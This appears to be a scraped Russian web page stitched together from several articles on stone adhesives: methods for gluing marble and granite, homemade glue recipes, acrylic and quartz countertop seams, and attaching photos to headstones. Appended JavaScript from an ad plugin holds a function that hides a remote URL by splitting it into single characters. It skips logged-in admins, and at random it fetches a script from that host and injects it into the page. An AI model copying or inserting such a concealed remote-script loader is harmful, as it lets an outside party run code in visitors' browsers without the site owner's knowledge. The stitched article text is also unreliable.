235 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Как выбрать клей для камня

На рынке существует масса различных вариантов клеевых составов для решения разных задач. Сегодня мы поговорим о клеях для работы с камнем. В этой статье мы расскажем о том, чем и как клеить натуральный камень и какой клей будет лучшим выбором для этого.

Натуральный камень имеет разные характеристики, например гранит — это твердый материал вулканического происхождения с большой удельной массой, а мрамор и известняк более рыхлые породы с большим содержанием различных минералов в составе и обладают менее большей твердостью и плотностью чем кварцесодержащие материалы.

Таким образом мы понимаем, что клей для камня должен обладать рядом определенных показателей для создания надежного клеевого соединения, такими как высокая адгезия в материал (способность проникать глубоко в поры материала), прочность после отверждения.

Для многих регионов, с низкими температурами и высокой влажностью не менее важными характеристиками будут влагостойкость и морозостойкость клеевого состава.

Лучшие производители

Лучшими производителями клеевых составов, предназначенных для натурального камня, являются компании:

  1. Elastorapid— выпускает продукты, имеющие в составе смолы синтетического происхождения.
  2. «Крепс Плюс» — производит сухие смеси на основе цемента высочайшего качества с добавлением модифицированных компонентов и речного песка.
  3. «Юнис» — осуществляет выпуск клеев на цементно-песчаной основе.
  4. Keraflex— занимается производством сухих цементных смесей.
  5. «Кераластик Т» — изготавливает дорогостоящие двухкомпонентные клеи.

В качестве отделочного материала снаружи зданий используются мраморные и гранитные плиты, а также другие разновидности натурального камня. Абсолютно все клеевые продукты, применяемые для крепления подобного отделочного материала, изготовления мозаики и инкрустации, устойчивы к воздействию низких отрицательных температур (морозостойкие).

Характеристики клеевых составов:

  • устойчивость к действию щелочей, кислот и ультрафиолетового излучения;
  • не растрескиваются, на сжимаются и не изменяют цвет после окончательного высыхания;
  • сохраняют эффективность при температуре от –20 до +100˚ C;
  • раствор полностью высыхает в течение двух-трех часов.

БЫСТРО

SEO оптимизация

адаптивная верстка

Ремонт в регионах

  1. Главная
  2. Строительство
  3. Декоративный камень
  4. Склеивание камня

Склейка известняка и мрамора может производиться: гипсом, магнезиальным цементом, портландцементом, шеллаком и карбинольным клеем; склейка гранитов — шеллаком и карбинольным клеем.
Гипсовая склейка может применяться только для облицовок, расположенных в закрытых и сухих помещениях, а также не подверженных механическим воздействиям. Из гипсовых вяжущих для склейки рекомендуются: формовочный гипс, высокопрочный (демпферный) гипс, цемент ЛОР.

Отбитые части тщательно очищаются от загрязнения; в плоскости излома высверливаются гнезда для медных заершенных штырей, располагаемые точно одно против другого. Диаметр гнезд больше диаметра штырей в 2—3 раза.
Сверление гнезд производится вручную электродрелью со сверлом из быстрорежущей стали или армированным твердым сплавом
Гипс тщательно отсеивается и предварительно проверяется на схватывание. Последовательность склеивания:

  • 1) приготовленный гипсовый раствор накладывается в гнезда для штырей;
  • 2) в одно из гнезд вставляется штырь, вокруг него делается небольшое конусообразное возвышение из гипсового раствора;
  • 3) склеиваемые куски соединяются вместе и в правильном положении оставляются до полного схватывания раствора.

Чтобы приблизить гипсовый раствор в швах к цвету мрамора, к нему добавляется необходимая краска; можно также закрасить склеенное место акварельной краской (без предварительной грунтовки).
Более прочный формовочный гипс приготовляется на насыщенном растворе алюминиевых квасцов. Для замедления схватывания гипс можно затворять на клеевой воде (0,5—2% столярного клея по весу гипса).

Склеивание магнезиальным цементом (каустический порошок из магнезита) производится исключительно для соединения мрамора и известняков. Преимущество способа состоит в том, что можно легко подобрать требуемые цвет и рисунок мрамора; кроме того, отпадает необходимость в течение длительного времени увлажнять склеиваемый участок водой.
В целях приближения раствора по цвету к склеиваемому камню допускается добавление мраморной пыли необходимой расцветки в соотношении не бо

лее 1:10 (магнезит: мраморная пыль) по весу. Затворение ведется на водном растворе хлористого магния плотностью 1,2 при температуре 15°.
Раствор приготовляется в фарфоровой ступке при непрерывном растирании пестиком до кашеобразной консистенции.
При изготовлении цветной мастики некоторое количество мраморной пыли может быть заменено соответствующим минеральным пигментом.
Склеивание белого мрамора может производиться с заменой магнезита жженой магнезией, представляющей собой белый порошок; прочность такой мастики значительно ниже.

Начало схватывания раствора — через 20 мин.; конец схватывания — через 6 часов с началй затворення. Временное сопротивление растяжению через сутки — не менее 15 кг/см2. Полная прочность раствора наступает через несколько суток

Склеивание портландцементом применяется для мрамора и известняка. Белый портландцемент используется при склейке белых сортов мрамора и известняков. Подкраска раствора под цвет камня производится добавкой красителя или мраморной пыли соответствующего цвета, в соотношении по весу 1 : 2 (цемент: мраморная пыль).
Склеенное место должно поддерживаться во влажном состоянии до полного схватывания и твердения раствора.

Склеивание шеллаком (горячий способ) применяется для темных цветных мраморов и для твердых пород. Склеиваемые части подогреваются не коптящим пламенем паяльной лампы (на чистых сортах бензина).
Последовательность процесса:

  1. в склеиваемых кусках высверливаются совпадающие гнезда для штырей;
  2. камень прогревается по всей поверхности склейки до температуры плавления шеллака (около 10СР) или несколько выше;
  3. в гнезда для штырей, если поверхность камня хорошо прогрета, засыпается порошкообразный шеллак (можно производить заливку расплавленного шеллака) и устанавливаются штыри;
  4. вся поверхность склейки засыпается шеллаком (к середине несколько более толстым слоем) и дополнительно прогревается паяльной лампой до полного сплавления шеллака;
  5. соединяемые части плотно прижимаются и оставляются до остывания.

При склеивании белых мраморов видимая часть шва прочищается на глубину 2—3 мм и заполняется мастикой под цвет мрамора.
Склеивание шеллаком настолько прочно, что восстановленная часть может обрабатываться ударным инструментом вместе с общей поверхностью.

Склеивание карбинольным клеем применяется для всех сортов плотного камня; практика использования этого клея мраморным заводом Метростроя в Москве показала исключительно высокие его качества.
Карбинольный клей частично полимеризованный (затвердевший) до густоты глицерннообразного сиропа. Полимеризация может быть ускорена добавкой катализаторов: 1—3% перекиси бензоила вызывает твердение через 1—2 суток; в присутствии 1—2% крепкой азотной кислоты (с плотностью 1,38— 1,40) — в течение 3—5 час.

Наполнители. Для экономии клея, ускорения склеивания, придания ему упругости и соответствующего цвета добавляются наполнители: окись цинка, цинковые белила, гипс, сернокислый барий, портландцемент, фарфоровая мука, мел, глина, алюминиевый порошок, красители; наполнители должны быть в виде сухого тонкого порошка; предусматривается отсутствие в них органических соединений.
Стойкость клея. Склеенные карбинольным клеем детали вполне стойки в отношении воздействия бензина, масел, воды, кис

лот, спиртов, ацетона (при условии склеивания плотных, не пористых сортов камня). Клей не теряет прочности при замораживании до —60° и при нагревании до + 60°. При нагревании выше этой температуры механическая прочность клея понижается.
Приготовление карбинольного клея. В фарфоровую, стеклянную или металлическую посуду отвешивается определенное количество сиропа, необходимое для работы на ближайшие 4—5 час. и от 1 до 3% перекиси бензоила, тщательно измельченной в ступке до тонкого порошка. Сироп перемешивается с катализатором в той же ступке в течение 28—30 мин. Истирание производят до полного исчезновения взвешенных частиц перекиси бензоила.

Приготовленный клей пригоден для использования в течение 5—6 час.
В случае необходимости добавки наполнителя последний вносится после растворения катализатора в сухом состоянии в виде тонкого порошка.
Подготовка поверхности. Плотность прилегания склеиваемых частей должна быть в пределах 0,2—0,3 мм. Поверхность очищается от пыли, грязи и тщательно протирается растворителем.

Склеивание. Клей готов к употреблению после внесения в его состав катализатора через 40—50 мин. Склеивание производится при температуре от 10 до 35°. При нанесении слоя клея в нем не должно быть пузырьков воздуха. Клеем смазываются обе поверхности, которые немедленно соединяются и оставляются в этом состоянии до полной полимеризации. Для заделки трещин рекомендуется клей с наполнителем.
Во время твердения детали должны быть расположены таким образом, чтобы поверхность склейки была горизонтальна. Перемещение деталей не допускается. Склейка должна производиться в чистом и сухом помещении.
Затвердение клея происходит:
при температуре:

10—15° через 2—3 суток.
20—25° через 20—25 час.
40—45° через 10—12 час
55—60° через 4—5 час

Склеенные детали обрабатываются или укладываются не ранее чем через трое суток после их склейки.
Швы клея на камнях, предназначенных для службы на открытом воздухе, должны тщательно предохраняться шеллаковой мастикой.
Определение качества склейки. По прошествии срока, необходимого для твердения, устанавливается качество склейки. При осмотре обращают внимание, хорошо ли заполнено пространство клеем; пустоты заполняют свежим клеем.

Клей для натурального камня собственного приготовления

Плиточный клей для гранита и мрамора, сделанный своими руками, может стать неплохой альтернативой готовым смесям. Конечно, он проигрывает заводским по прочности, времени застывания. Но если нужно что-то отремонтировать, а объем работ небольшой, покупать клей не обязательно.

Для приготовления клеящего состава для каменной плитки понадобятся гипс, гуммиарабик в порошке и бура . Все компоненты берут в соотношении 4:1:1 . Буру растворяют в небольшом количестве холодной воды. Гипс смешивают с гуммиарабиком, добавляют разведенную буру до консистенции густого теста. Изделия, скрепленные таким образом, нужно оставить высыхать 5-6 дней.

Клей, хорошо скрепляющий плиточный гранит и мрамор, можно приготовить по-другому. Для этого нужно взять воск, каучук и измельченный мрамор ( 2:1:2 ). Все компоненты смешивают и подогревают. Перед нанесением клеевого состава нужно убедиться в сухости каменной плитки. Прежде чем приклеить гранит или мрамор, следует позаботиться о последующей обработке швов. Для этого в часть состава нужно добавить алебастр. Если работа ведется с цветным мрамором, то можно добавить охру, с гранитом — немного шифера. Таким клеем после скрепления камня затирают швы. После высыхания плиту нужно отполировать мелкой пемзой.

Ассортимент строительных материалов, предлагаемых сегодня в торговой сети, не заставляет покупателя долго раздумывать о том, как склеить мрамор или гранит. Нужно всего лишь выбрать из разнообразия подходящий по цене и направлению состав, развести его в соответствии с прилагаемой инструкцией и аккуратно выполнить работу.

При выборе важно учитывать состав самого искусственного камня. Он производится на основе акриловых полимерных соединений, поэтому для того, чтобы добиться качественного соединения необходимо использовать двухкомпонентный метакрилатный клей. Он соответствует связующему веществу самого материала.

Что представляет собой двухкомпонентный клей

Он состоит из двух компонентов: акрилового полимера и затвердителя. Мономер акрила, который входит в состав, выступает полимеризатором, именно он надежно скрепляет детали в единое целое.

Метакрилатный клей обладает такими свойствами:

  • Прочностью, износостойкостью
  • Высокой адгезией;
  • Устойчивостью к перепадам температур, ультрафиолету.
  • Жидкое состояние позволяет заполнить все щели.

При работе нужно учитывать, что полимеризация происходит быстро, поэтому смешивание компонентов производится непосредственно перед работой. В среднем время полимеризации 15 — 30 минут, зависит от температуры окружающей среды.

Клей для искусственного клея применяют не только для соединения деталей, но и для реставрации изделий из этого материала. Например, если от столешницы откололась часть камня, то прикрепить ее на месть можно при помощи все того же двух компонентного клей.

Выбор клея для достижения максимальной невидимости шва.

Может ли полностью отсутствовать шов при соединении деталей искусственного камня? Конечно, это невозможно, шов будет обязательно, но важно добиться максимальной незаметности этого шва.

В этом случае основную роль играет правильный подбор цвета клея. Если оттенок подобран правильно, тогда шов будет практически незаметен.

Стоит учитывать тот факт, что видимость шва зависит от текстуры акрилового камня. При соединении камня с однородной текстурой, можно добиться максимально хороших результатов. Но, если соединяются детали с крупным рисунком, то нарушение рисунка будет заметно даже при правильно подобранном клее.

Форма выпуска

Клей для камня, как правило, поставляется в упаковках небольшого объема. Это специальные картриджи с наполнителем и отвердителем. Клей наносится при помощи специального ручного пистолета, в котором имеет носик-смеситель. В нем происходит смешивание наполнителя и отвердителя, в соотношении 1:10.

Объем картриджа может варьироваться от 50 до 490 мл. Выбор зависит от объема производства. Картридж объемом 50 мл позволит склеить от 2,5 до 3 метров шва, 75 мл – около 5 метров шва. Для крупных предприятий, производители клея, предлагают картриджи объемом 250 и 490 мл.

Особенности применения клея

На рынке представлено достаточно много марок клея для искусственного камня, но, несмотря на это, все они имеют общие принципы использования и хранения.

Хранение

Срок годности клея указывают на упаковке, он составляет 1,5 года от даты изготовления.

Рекомендации по хранению:

  • Хранить необходимо в прохладных помещениях, избегать попадания прямых солнечных лучей.
  • В теплом помещении срок хранения сокращается.
  • Картриджи хранятся в горизонтальном положении, во избежание расслоения компонентов наполнителя и оседания красящих пигментов.

Перед использованием клея

Для того, чтобы обеспечить выход пузырьков воздуха из наполнителя и отвердителя, клей необходимо не менее суток перед началом работы хранить в вертикальном положении.

Наличие пузырьков может снизить прочность шва. Особенно если они будут присутствовать в отвердителе – его пропорционально меньше поступает в тубус, чем наполнителя. При недостаточном количестве отвердителя реакция полимеризации смолы может не произойти.

Перед применением картридж должен нагреться до комнатной температуры.

Последовательность работы с клеем:

Перед началом работы необходимо обезжирить поверхность, на которую будет наноситься клей. Для этого можно использовать этиловый спирт. Приступить к работе можно только после того, как спирт полностью испариться.

Далее отсоединяется миксер, картридж вставляется в пистолет в вертикальном положении.

Важно убедиться, что при нажатии курка, клей и затвердитель поступают одновременно. При их смешивании происходит реакция полимеризации, которая сопровождается выделением тепла. Стоит учитывать, что температура клея при этом поднимается до 110 градусов! Время полимеризации зависит от температуры окружающей среды, влажности, среднее время полимеризации 45±10мин. Работу по склейке нужно произвести в течении 10-15 минут. Перемещать и производить дельнейшие работы со склеенными изделиями можно спустя 1 час.

Если в клее есть пузырьки (их хорошо видно при исследовании клея на просвет), необходимо поставить картридж вертикально пока пузырьки не поднимутся вверх и выпустить их.

Оптимальная температура помещения при работе с клеем составляет 18-25 градусов.
Возможно повторное использование картриджа, если после использования остался клей. Миксер должен быть использован в течение 5 минут после последнего применения. Для хранения картриджа удаляется миксер, и устанавливается назад крышка.

Марки двухкомпонентного клея для искусственного камня

На рынке представлено достаточно много марок двухкомпонентного клея. Производители искусственного камня рекомендуют использовать для склеивания деталей клей марки, которая соответствует марке камня. Для Corian и Montelli – рекомендуют клей Corian, для Tristone – клей Tristone.

К искусственному камню REHAU Rausolid компания выпускает клей с идентичным названием – Rausolid. Он является точным аналогом камня, только в жидком состоянии. При застывании он позволяет добиться высоких результатов – шов становится незаметным.

При этом цвет клея должен точно соответствовать цвету самого камня. Это очень важно для производителей изделий из искусственного камня, так как это позволяет добиться максимального эффекта безшовности.

Универсальный двухкомпонентный клей

Стоимость оригинального клея от производителей искусственного камня часто оказывается высокой, что увеличивает затраты на производство, а соответственно и стоимость готового изделия. Компании, которые не один год работают с этим материалом, используют в работе универсальные клеевые составы. Их ассортимент позволит выбрать экономный, но далеко не плохой вариант.

Клей Акрид

Можно применять для работы с большинством марок искусственного камня: Staron, Corian, Montelli, Hi Macs, Akrilika, Hanex, Tristone. Понятный сервис по подбору соответствующего цвета, позволяет подобрать необходимый цвет к каждой марке. Всего в каталоге более 300 разных цветов. При этом производители камня предлагают не более 150 разных оттенков.

Клей отечественного производства, что особенно актуально в рамках государственной программы по импортозамещению. Он является достойной альтернативой импортным аналогам, при этом стоимость его в разы ниже. Обеспечивает высокое качество склейки, хорошо переносит воздействие окружающей среды.

Для изготовителей важным моментом является сроки поставки. Так, как продукт производиться в России, время доставки необходимого цвета минимально, а стоимость не зависит от курса валюты.

Универсальность, качество клея Акрид уже оценили многие производители изделий из искусственного камня, его используют крупные мебельные фабрики России и компании, которые изготавливают изделия на заказ.

Техническая информация

Эпоксидный клей для склеивания гранита

Эпоксидный клей предназначен для наружных и внутренних работ, в широком температурном режиме — от -30 0 С до +60 0 С. Он инертен по отношению к агрессивным средам (влага, плесень, УФ-излучение) и демонтирует высокую степень адгезии. С помощь эпоксидного клея можно склеить не только две части гранита, но и приклеить к нему другой материал, например, дерево, металл, стекло.

Так же как и полиэфирный клей-мастика, эпоксидный состав может быть разной консистенции – жидкая или густая. Обе можно использовать при работах, как в горизонтальной, так и в вертикальной плоскости. После застывания они при необходимости отлично поддаются шлифовке и полировке.

Обратите внимание! Эпоксидный клей имеет двухкомпонентный состав, который готовиться согласно инструкции применения непосредственно перед нанесением на поверхность. А для того, чтобы место склеивания было малозаметным можно выбрать прозрачный или цветной клей.

Технология склейки столешниц из камня

Пример качественного шва при склейке столешницы из кварцевого камня Samsung Radianz Soback Beige

По статистике компании Энитоп большинство кухонных столешниц — угловые. А это значит, что габаритные размеры столешницы ни при каком условии не позволят сделать её из цельной плиты камня. Стоит ли опасаться шва на каменной столешнице, или можно смело подписывать чертёж и отправлять заказ в работу?

Для начала давайте разберёмся с основной причиной, которая приводит к необходимости склеивать большие кухонные поверхности: это размер исходных плит камня.

Размеры плит камня для столешниц

Все многочисленные бренды акрилового камня производят плиты своего материала одинакового размера. К этим брендам относятся акрил LG Hi-Macs, Hanex, Samsung Staron, Tristone, Montelli и многие другие марки — все они выпускаются в формате 0,76 м × 2,49 м.

В случае с кварцевым камнем всё иначе: имеются определённые вариации размеров в зависимости от бренда: от 1,24 м до 1,55 м в ширину и от 3,00 м до 3,06 м в длину. Однако чаще всего плиты кварцевого камня (которые также называют слэбами) производят в размере 3,00 м × 1,40 м.

Детали кварцевой столешницы Энитоп, подготовленные к склейке

Разумеется, этих длин оказывается недостаточно для производства больших цельных столешниц, ведь иногда они достигают в длину 5, 6, или даже 7 метров. Кроме того, серьёзная проблема возникает в процессе доставки.

К примеру, столешница длиной 3 метра может элементарно не пройти в лифт (пускай даже грузовой), или же она может не поместиться в габариты лестничного пролёта. Разумеется, немного проще монтировать столешницы в частных домах, но и там есть свои нюансы.

Кроме того существует ещё один очень важный момент. К моменту монтажа в качественно изготовленной на фабрике столешнице уже должны быть выпилены отверстия для мойки и варочной панели. А при транспортировке столешницы все эти тонкие перемычки в месте выпилов очень легко повредить самим весом изделия.

Выпиливание отверстий в столешнице на фабрике Энитоп с использованием оборудования с ЧПУ

Именно поэтому все столешницы среднего и большого размера обязательно следует производить не из одной, а из нескольких деталей — и значит, на поверхности непременно будет шов. Главный вопрос, который при этом возникает у клиентов — как именно будет выглядеть шов, а также насколько он будет надёжен и долговечен?

Чтобы ответить на этот вопрос, давайте взглянем на процесс склейки как кварцевой, так и акриловой столешницы, и сравним их.

Шов и склейка столешниц из акрилового камня

Следует признать, что именно возможность создания практически невидимого шва — одно из основных достоинств акрилового камня. По своей природе он пластичный и совсем не твёрдый материал. Это кажется существенным недостатком в тот момент, когда рабочая поверхность столешницы оказывается беззащитной перед царапинами и различными отметинами.

Но в то же время эта нетвёрдость позволяет перешлифовывать и переполировывать его прямо во время монтажа. Немалую роль в этом процессе играет ручной инструмент, который используют монтажники, что иногда приводит к некачественному результату вследствие недостатка квалификации.

Процесс полировки столешницы из акрилового камня после склейки (Фото с сайта: www.youtube.com)

Склеить нескольких деталей акриловой столешницы вроде бы не так сложно:

  1. Торцы готовых деталей столешницы обрабатывают и шлифуют;
  2. Внутри торцов деталей вырезают отверстия и монтируют специальные стяжки;
  3. Столешницу помещают на кухонную мебель, нанося на торцы двухкомпонентный клей;
  4. Детали стягивают, зажимают струбцинами и ждут, пока клей не затвердеет;
  5. Излишки клея аккуратно срезают и всю прилегающую зону шлифуют, а затем полируют.

Если все операции выполнены профессионально, то получившийся шов практически не заметен. Впрочем, видимость шва до определённой степени зависит от цвета и узора столешницы. Так, при наличии крупного узора на столешнице, его рисунок на одной детали может не совпасть с соседней, а значит, будет сильнее бросаться в глаза.

Шов и склейка столешниц из кварцевого камня

Кварцевый камень — уже гораздо более твёрдый материал, чем акрил. Если серьёзно, то он даже прочнее гранита, поскольку на 93% состоит из кварца, в то время как гранит — в среднем лишь на 25–35%. Такая высокая прочность кварцевых столешниц делает процесс их изготовления более трудоёмким и требующим использования более продвинутого оборудования.

Ручной инструмент здесь совершенно не годится, и весь процесс изготовления должен проходить на фабрике. Подготовка деталей к склейке также начинается именно там.

Давайте посмотрим на процесс склейки деталей кварцевой столешницы.

  1. Обработка торцов деталей кварцевой столешницы;
  2. Вырезание на высокоточном оборудовании несквозных отверстий под стяжки;
  3. Монтаж столешницы на кухонную мебель с проклейкой швов полиэфирным клеем;
  4. Стяжка деталей столешницы (в этот момент происходит выдавливание излишков клея на поверхность);
  5. Удаление излишнего клея.

Процесс склейки деталей столешницы из кварцевого камня Энитоп

Если монтаж произведён специалистами высокого класса, то шов от склейки столешницы из камня будет иметь минимальную толщину и не станет привлекать к себе внимание. Увидеть его удастся только в том случае, если внимательно и пристально разглядывать поверхность.

Однако поскольку столешницы для кухни обычно заказывают не для того, чтобы рассматривать их с лупой, шов визуально сливается с кварцевым камнем и вскоре даже сам владелец не вспомнит, где именно он находится.

Невидимые места склейки на столешницах из камня Энитоп

Кстати, в случае с кварцевыми столешницами особенно важен цвет клея. На фабрике Энитоп для каждого конкретного изделия специалисты изготавливают свой собственный уникальный цвет. За счёт этого удаётся достичь идеального попадания в цвет.

Отличия в технологии склейки столешниц из камня

Сравнивая склейку столешницы из камня акрилового и кварцевого, легко заметить, что эти процессы очень похожи. За одним исключением — шлифовка и полировка во время склейки кварцевого камня обычно не производится.

Как уже было отмечено выше, кварцевый камень очень твёрдый, поэтому качественно выполнить полировку ручным инструментом очень сложно. Граница фабричной полировки и ручной полировки сразу бросится в глаза.

А столешницу из акрила можно с лёгкостью очень быстро переполировать обычной шлифовальной машиной хоть всю целиком.

Разумеется, многих эта возможность сразу же должна насторожить, ведь таким образом лишний раз демонстрируется непрочность акрила как материала для столешницы. Любое неосторожное соприкосновение с острым предметом — и поверхность безнадёжно поцарапана. Но ведь не вызывать же ради каждой царапины мастеров?

Основные выводы из этого сравнения мы оформили в виде небольшой удобной таблицы:

Клей для натурального камня. Мой выбор

Например, в ассортименте есть клей тенакс для травертина с каменной крошкой. По инструкции он должен был прекрасно подойти для заделки больших каверн на слэбах. А после шлифовки и полировки травертина, должна была произойти полная имитация камня Своими руками все проделав, стало понятно, что не все так радужно, как написано в инструкции.
Наносить такой клей на натуральный камень очень проблематично, каменная крошка сильно мешает и на большой площади шпателем вдавить клей во все поры камня довольно сложно.
Затем выяснилось, что цвет мастики не подходит под основной цвет камня, а каменная крошка, входящая в этот клей для натурального камня сильно контрастирует со всей площадью. Эксперимент был проведен и эта банка с клеем простояла на полке очень долго, пока не нашлось ей достойное применении. (нашелся подходящий камень).

С практикой пришло понимание основных видов клея для природного камня, который нужно использовать. Это бежевый густой двухкомпонентный клей тенакс Solido Paglierino и медовый густой Solido Trasparente (клей тенакс) тоже полиэфирный двухкомпонентный.
Смешивая их в различных пропорциях и добавляя нужный краситель, можно добиться идеального сочетания. И создать своими руками имитацию камня.

Под термином имитация камня своими руками, я не подразумеваю искусственный камень. Нет.. Своими руками сделать имитацию камня нужно в случае реставрации каменных изделий. Уголок отвалился, склеить камень, если он раскололся, заделать каверну или раковину и в этих случая, чтобы не было видно разницы и нужно полностью выполнить имитацию используемого натурального камня.

Как приклеить на гранитное надгробие фотографию: правила выбора спецсредств

Фото на памятник можно наклеить самостоятельно. Состав для этого подбирается в зависимости от материала, на который нанесено изображение.

Клеевой слой в этом случае очень тонкий, важно, чтобы он хорошо заполнял трещинки, не пропускал воду, выдерживал скачки температур. Подойдет двухкомпонентный эпоксидный клей Поксипол или жидкие гвозди.

  1. Обезжирить обе поверхности.
  2. Приложить фото к плите и обвести маркером или карандашом, чтобы точно разметить место приклеивания.
  3. Желательно заднюю поверхность керамической плитки с изображением потереть наждачкой, чтобы улучшить адгезию.
  4. Нанести клей на заднюю часть фотографии и приложить к стеле. Придавить.
  5. Чтобы предотвратить сползание изображения при схватывании – зафиксировать проволокой или бечевкой. Для герметизации швов используется клей «Бизон».
  6. Излишки клея стереть.

Монумент из гранита – это долгая память об усопшем. Он долговечен и красив. Надежный клей для установки памятника поможет сохранить мемориал в его первозданном виде.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e<=0&&(clearInterval(a),t.parent().replaceWith(''))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e<=0&&(clearInterval(a),t.parent().replaceWith(''))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length&&_.each(function(){var t=ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('
');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o<300||e.each(function(){var t=ff(this),e=o,a=t.data("top");t.wrap('
');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t<300||ff(".flatPM_sticky_wrapper.flatPM_sidebar_block").css("height",t)},4e3)}),"undefined"!=typeof flat_pm_video&&flatPM_video(flat_pm_video),0 *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([\w:]+)[^>]*)\/>/gi,d=/<([\w:]+)/,i=/<|?\w+;/,c={option:[1,""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"<$1>$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var 